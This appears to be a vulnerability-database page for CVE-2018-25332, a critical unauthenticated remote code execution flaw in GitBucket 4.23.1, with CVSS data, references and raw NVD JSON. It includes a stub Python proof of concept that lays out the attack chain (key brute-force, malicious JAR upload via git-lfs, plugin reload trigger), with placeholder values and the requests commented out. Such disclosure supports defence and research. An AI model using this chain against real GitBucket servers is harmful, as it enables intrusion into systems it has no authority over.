CVE-2018-25332

Description

GitBucket 4.23.1 contains an unauthenticated remote code execution vulnerability that allows attackers to execute arbitrary commands by exploiting weak secret token generation and insecure file upload functionality. Attackers can brute-force the Blowfish encryption key, upload a malicious JAR plugin via the git-lfs endpoint, and execute system commands through an exposed exploit endpoint.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

GitBucket 4.23.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_host = "http://vulnerable-gitbucket:8080"

# Step 1: Brute force the weak Blowfish secret key
# The key space is small, allowing rapid cracking.
secret_key = "cracked_secret_key"

# Step 2: Prepare malicious JAR plugin
malicious_jar_path = "./exploit.jar"
lfs_endpoint = f"{target_host}/git-lfs/objects/batch"

# Step 3: Upload the malicious JAR via git-lfs
# Use the cracked key to sign/authenticate the upload request
files = {"file": open(malicious_jar_path, "rb")}
headers = {"Authorization": f"Bearer {secret_key}"}

# response = requests.post(lfs_endpoint, files=files, headers=headers)
# print(f"Upload status: {response.status_code}")

# Step 4: Trigger RCE
# Access the exposed endpoint to force load the uploaded plugin
trigger_url = f"{target_host}/api/v3/plugins/reload"
# requests.post(trigger_url, headers=headers)

print("PoC Logic completed: Key Brute-force -> JAR Upload -> RCE Trigger")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25332
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25332
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25332/
[4] VulDB https://vuldb.com/cve/CVE-2018-25332
[5] https://github.com/gitbucket/gitbucket
[6] https://security.szurek.pl/
[7] https://www.exploit-db.com/exploits/44668
[8] https://www.vulncheck.com/advisories/gitbucket-unauthenticated-remote-code-execution

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25332", "sourceIdentifier": "[email protected]", "published": "2026-05-17T13:16:44.840", "lastModified": "2026-05-18T20:16:05.873", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitBucket 4.23.1 contains an unauthenticated remote code execution vulnerability that allows attackers to execute arbitrary commands by exploiting weak secret token generation and insecure file upload functionality. Attackers can brute-force the Blowfish encryption key, upload a malicious JAR plugin via the git-lfs endpoint, and execute system commands through an exposed exploit endpoint."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://github.com/gitbucket/gitbucket", "source": "[email protected]"}, {"url": "https://security.szurek.pl/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/44668", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/gitbucket-unauthenticated-remote-code-execution", "source": "[email protected]"}]}}